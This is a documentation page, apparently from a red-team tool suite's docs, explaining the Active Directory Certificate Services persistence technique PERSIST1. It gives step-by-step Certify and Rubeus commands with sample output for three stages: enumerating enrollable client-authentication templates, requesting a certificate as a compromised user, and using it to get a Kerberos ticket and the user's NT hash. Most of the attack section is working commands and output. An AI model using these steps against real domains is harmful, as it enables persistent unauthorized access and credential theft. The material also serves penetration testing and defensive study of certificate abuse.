> ## Documentation Index
> Fetch the complete documentation index at: https://docs.specterops.io/llms.txt
> Use this file to discover all available pages before exploring further.

# PERSIST1 - User Persistence via Certificates

> Learn how to extend initial access to a user into persistent access by requesting a client authentication certificate in the context of the user account.

PERSIST1 is a technique used to extend initial access to a user into persistent access by requesting a client authentication certificate in the context of the user account, which can be used for future authentication as the user account. If, for example, a phishing attack is successful and access is obtained as a user for which the credentials are unknown, persistent access to that user can be obtained through certificates.

## Template Requirements

According to [Certified Pre-Owned](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf), a suitable certificate template must meet these criteria:

<Accordion title="Enterprise CA Enrollment Rights">
  The enterprise CA grants enrollment rights to the user account. Otherwise, the account would be unable to request any certificates from the CA.
</Accordion>

<Accordion title="Template Enrollment Rights">
  The certificate template grants enrollment rights to the user account. Otherwise, the account would be unable to request certificates based on the specific template.
</Accordion>

<Accordion title="Manager Approval Disabled">
  The "manager approval" feature is disabled for the certificate template. Otherwise, a "CA Manager" would have to manually review and approve the certificate request.
</Accordion>

<Accordion title="Authorized Signature Disabled">
  The "authorized signature" feature is disabled for the certificate template. Otherwise, an enrollment agent would need to sign the certificate request on behalf of the requester.
</Accordion>

<Accordion title="Client Authentication EKU">
  The certificate template defines an Extended Key Usage (EKU) that enables client authentication:

  * `Client Authentication` (`1.3.6.1.5.5.7.3.2`)
  * `PKINIT Client Authentication` (`1.3.6.1.5.2.3.4`)
  * `Smart Card Logon` (`1.3.6.1.4.1.311.20.2.2`)
  * `Any Purpose` (`2.5.29.37.0`)
  * `Subordinate CA` (No EKUs)
</Accordion>

## Enumeration

We can search for certificate templates with these conditions using the [`enum-templates --filter-client-auth`](/ghostpack-docs/Certify.wik-mdx/1-command-overview#enumerate-templates) command from Certify.

<CodeGroup>
  ```bash PowerShell theme={null}
  Certify.exe enum-templates --filter-enabled --filter-client-auth --hide-admins
  ```

  ```diff Sample Output theme={null}
     _____          _   _  __
    / ____|        | | (_)/ _|
   | |     ___ _ __| |_ _| |_ _   _
   | |    / _ \ '__| __| |  _| | | |
   | |___|  __/ |  | |_| | | | |_| |
    \_____\___|_|   \__|_|_|  \__, |
                               __/ |
                              |___./
    v2.0.0

  [*] Action: Find certificate templates
  [*] Using the search base 'CN=Configuration,DC=corp,DC=local'
  [*] Classifying vulnerabilities in the context of built-in low-privileged domain groups.

  ...

  [*] Enabled certificate templates found using the current filter parameters:

      Template Name                         : User
      Enabled                               : True
      Publishing CAs                        : ca01.corp.local\CORP-CA01-CA
      Schema Version                        : 1
      Validity Period                       : 1 year
      Renewal Period                        : 6 weeks
      Certificate Name Flag                 : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
      Enrollment Flag                       : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
  +   Manager Approval Required             : False
  +   Authorized Signatures Required        : 0
  +   Extended Key Usage                    : Client Authentication, Encrypting File System, Secure Email
      Certificate Application Policies      : <null>
      Permissions
        Enrollment Permissions
  +       Enrollment Rights           : CORP\Domain Users               S-1-5-21-976219687-1556195986-4104514715-513
        Object Control Permissions

  Certify completed in 00:00:01.7777410
  ```
</CodeGroup>

<Tip>
  Use `--filter-enabled` to only show templates published by a CA and `--hide-admins` to reduce noise in the output.
</Tip>

Once we have identified a suitable certificate template that the user account can enroll in, we can request a certificate based on the template using the [`request`](/ghostpack-docs/Certify.wik-mdx/1-command-overview#request-certificates) command from Certify.

```diff theme={null}
> Certify.exe request --ca ca01.corp.local\CORP-CA01-CA --template User

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v2.0.0

[*] Action: Request a certificate

[*] Current user context    : CORP\lowpriv
[*] No subject name specified, using current context as subject.

[*] Template                : User
[*] Subject                 : CN=lowpriv, OU=Users, OU=Corp, DC=corp, DC=local

[*] Certificate Authority   : ca01.corp.local\CORP-CA01-CA
[*] CA Response             : The certificate has been issued.
[*] Request ID              : 1

[*] Certificate (PFX)       :

MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh...

Certify completed in 00:00:04.3614718
```

When the certificate has been issued, it can be used to persistently authenticate as the user account using the [`asktgt`](/ghostpack-docs/Rubeus-mdx/commands/ticket-requests/asktgt) command from [Rubeus](/ghostpack-docs/Rubeus-mdx/overview). We can also use the `/getcredentials` parameter to request a U2U service ticket and retrieve the password NT hash for the user account.

```diff theme={null}
> Rubeus.exe asktgt /user:lowpriv /certificate:MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh... /getcredentials

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: E=lowpriv@corp.local, CN=lowpriv, OU=Users, OU=Corp, DC=corp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'corp.local\lowpriv'
[*] Using domain controller: 10.10.10.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGHjCCBhqgAwIBBaEDAgEWooIFMTCCBS1hggUpMIIFJaADAgEFoQ8bDU1FR0FLRUsuTE9DQUyiIjAg
      ...

  ServiceName              :  krbtgt/corp.local
  ServiceRealm             :  CORP.LOCAL
  UserName                 :  lowpriv
  UserRealm                :  CORP.LOCAL
  StartTime                :  30/06/2025 15.16.52
  EndTime                  :  01/07/2025 01.16.52
  RenewTill                :  07/07/2025 15.16.52
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  AFXzq5Bai41JhCj70jrfyA==
  ASREP (key)              :  D4F939DAB9C7B93717EB048B0F0F5F5C

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
+      NTLM              : 31D6CFE0D16AE931B73C59D7E0C089C0
```

<Warning>
  The issued certificate will be able to authenticate for as long as is mentioned in the `Validity Period` attribute of the certificate template. In order to extend the persistence period, you need to abuse [PERSIST3 - Account Persistence via Certificate Renewal](./persist3-account-persistence-via-certificate-renewal).
</Warning>
